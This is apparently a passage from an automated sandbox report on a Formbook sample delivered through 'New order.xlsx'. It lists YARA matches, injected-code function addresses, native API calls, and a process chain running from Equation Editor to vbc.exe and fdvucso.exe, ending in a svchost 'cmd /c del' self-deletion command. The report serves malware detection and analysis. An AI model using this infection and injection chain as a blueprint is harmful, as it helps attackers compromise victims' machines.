        Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01321890
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0132C3BD
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0132A184
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0132B3F1
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01329C12
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_013296A0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01327E88
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_00110A56
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041E819
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00401030
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041E0B6
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00402D89
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00402D90
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00409E5B
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00409E60
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041DE2C
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041E79E
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00402FB0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0132A184
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_01321890
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0132C3BD
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0132B3F1
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_01329C12
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_013296A0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_01327E88
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A4E0C6
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A7D005
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A53040
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A6905A
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A4E2E9
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AF1238
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AF63BF
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A4F3CF
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A763DB
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A52305
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A9A37B
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A57353
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A85485
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A61489
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A8D47D
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A6C5F0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A5351F
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A96540
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A54680
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A5E6C1
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AF2622
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A9A634
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A5C7BC
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AD579A
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A857C3
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AEF8EE
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A7286D
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A5C85C
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A529B2
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AF098E
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A669FE
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AD5955
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00B03A83
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00AFCBA4
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0072D06D
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B3040
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006C905A
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006DD005
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006AE0C6
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00751238
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006AE2E9
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006FA37B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B7353
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B2305
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006AF3CF
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006D63DB
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_007563BF
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006ED47D
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0073443E
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006C1489
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006E5485
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006F6540
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B351F
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006CC5F0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00752622
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006FA634
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006BE6C1
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B4680
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006E57C3
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006BC7BC
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0073579A
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006D286D
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006BC85C
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0074F8EE
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00735955
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0073394B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006C69FE
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B29B2
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075098E
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00763A83
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006D7B00
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0073DBDA
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075CBA4
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006BCD5B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006E0D3B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0074FDDD
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006CEE4C
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006E2E2F
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006DDF7C
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006C0F3F
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00722FDC
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0074CFB1
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011E0B6
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011E79E
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011E819
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00102D90
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00102D89
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00109E5B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00109E60
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00102FB0
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 00A4DF5C appears 89 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 00A9373B appears 176 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 00A93F92 appears 71 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 00ABF970 appears 56 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 01324599 appears 38 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: String function: 01322400 appears 54 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 006AE2A8 appears 38 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0071F970 appears 84 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 006ADF5C appears 121 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 006F373B appears 245 times
        Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 006F3F92 appears 132 times
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A360 NtCreateFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A410 NtReadFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A490 NtClose,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A35A NtCreateFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A40A NtReadFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041A53A NtAllocateVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A400C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A40078 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3F9F0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3F900 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A410D0 NtOpenProcessToken,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A40060 NtQuerySection,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A401D4 NtSetValueKey,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A4010C NtOpenDirectoryObject,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A41148 NtOpenThread,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A407AC NtCreateMutant,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3F8CC NtWaitForSingleObject,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A41930 NtSetContextThread,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3F938 NtWriteFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FAB8 NtQueryValueKey,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FA20 NtQueryInformationFile,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A3FA50 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A00C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A07AC NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069F900 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069F9F0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FAB8 NtQueryValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FB50 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A0060 NtQuerySection,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A0078 NtResumeThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A0048 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A10D0 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A1148 NtOpenThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A010C NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A01D4 NtSetValueKey,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069F8CC NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069F938 NtWriteFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A1930 NtSetContextThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FA50 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FA20 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FBE8 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FC48 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A0C40 NtGetContextThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FC30 NtOpenProcess,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FC90 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FD5C NtEnumerateKey,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006A1D80 NtSuspendThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FE24 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FEA0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FF34 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0069FFFC NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A360 NtCreateFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A410 NtReadFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A490 NtClose,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A540 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A35A NtCreateFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A40A NtReadFile,
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011A53A NtAllocateVirtualMemory,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory allocated: 77620000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory allocated: 77740000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory allocated: 77620000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory allocated: 77740000 page execute and read and write
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 77620000 page execute and read and write
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 77740000 page execute and read and write
        Source: New order.xlsxVirustotal: Detection: 40%
        Source: New order.xlsxReversingLabs: Detection: 34%
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
